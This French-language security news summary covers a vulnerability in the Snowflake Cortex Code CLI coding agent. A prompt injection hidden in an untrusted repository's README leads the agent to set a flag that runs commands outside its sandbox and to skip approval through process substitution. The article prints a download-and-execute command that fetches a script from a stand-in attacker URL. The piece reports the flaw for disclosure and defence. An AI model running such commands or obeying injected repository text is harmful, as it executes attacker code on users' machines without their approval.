Vulnérabilité de l'interface en ligne de commande (CLI) de Snowflake Cortex Code permettant une échappée du bac à sable et l'exécution de logiciels malveillants
Détails de la vulnérabilité
Snowflake Cortex Code CLI est un agent de codage en ligne de commande qui fonctionne de manière similaire à Claude Code et Codex d'OpenAI, avec une intégration intégrée pour exécuter SQL dans Snowflake. Deux jours après sa sortie, une vulnérabilité a été identifiée dans le système de validation des commandes de Cortex Code qui permettait à des commandes malveillantes spécialement construites d'exécuter des commandes arbitraires sans déclencher les étapes d'approbation humaine et d'exécuter ces commandes en dehors du bac à sable de Cortex CLI.
Chaîne d'attaque
L'attaque fonctionne via une injection indirecte de prompt. Un utilisateur ouvre Cortex et active le bac à sable, puis demande à Cortex de l'aider avec une base de code open source tierce. Une injection de prompt cachée dans le README d'un dépôt non fiable manipule Cortex pour lui faire croire qu'il doit exécuter une commande dangereuse.
Cortex n'a pas validé les commandes à l'intérieur des expressions de substitution de processus, permettant l'exécution non approuvée de la commande malveillante :
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Cette commande télécharge un script depuis le serveur d'un attaquant et l'exécute. Le contournement a fonctionné car :
- Les commandes dangereuses à l'intérieur d'une expression de substitution de processus <() n'étaient pas évaluées par le système de validation
- La commande complète commençait par une commande 'sûre' (cat dans ce cas)
- Les commandes dans les expressions de substitution de processus ne déclenchaient jamais l'approbation humaine
Contournement du bac à sable
L'injection de prompt manipule également le modèle pour définir un drapeau qui déclenche l'exécution de commandes hors bac à sable. Cortex, par défaut, peut définir un drapeau pour déclencher l'exécution de commandes hors bac à sable, et l'injection utilise cela pour permettre à la commande malveillante de s'exécuter en dehors du bac à sable.
Remédiation
L'équipe de sécurité de Snowflake a validé et corrigé cette vulnérabilité, publiant un correctif avec Cortex Code CLI version 1.0.25 le 28 février 2026. L'avis complet de Snowflake est disponible sur le site communautaire Snowflake à : https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Note : Cette chaîne d'attaque s'appliquait également aux utilisateurs non bac à sable. La documentation indique qu'en mode OS+Régulier, toutes les commandes demandent l'approbation de l'utilisateur. Les commandes exécutées dans le bac à sable ont également des restrictions d'accès réseau et de fichiers.
📖 Lire la source complète : HN AI Agents
👀 See Also
Isolement des agents IA avec WebAssembly : Autorité zéro par défaut
Cosmonic soutient que le sandboxing traditionnel (seccomp, bubblewrap) échoue pour les agents IA à cause de l'autorité ambiante. Le modèle basé sur les capacités de WebAssembly accorde zéro autorité par défaut, nécessitant des importations explicites pour le système de fichiers, le réseau ou les identifiants.
Faux site Claude diffuse le malware PlugX via une attaque de sideloading.
Un faux site web Claude sert un installateur trojanisé qui déploie le malware PlugX via un chargement latéral de DLL, donnant aux attaquants un accès à distance aux systèmes compromis. L'attaque utilise un programme de mise à jour G DATA antivirus légitimement signé pour charger du code malveillant.
Sandboxing OpenClaw : Renforcer la sécurité dans le codage de l'IA
Découvrez les dernières discussions de la communauté OpenClaw sur le sandboxing, une technique cruciale pour sécuriser les agents de codage IA. Explorez pourquoi les utilisateurs estiment qu'elle est essentielle pour protéger les innovations en IA.
Le problème des gardes en uniforme : pourquoi les environnements d'agents ont besoin d'identité, pas seulement de politiques
Le bac à sable openshell de Nemoclaw applique des politiques aux binaires, permettant aux logiciels malveillants de vivre sur le territoire en utilisant les mêmes binaires que l'agent. ZeroID, une couche d'identité d'agent open-source, applique des politiques de sécurité aux agents soutenus par des identités sécurisées.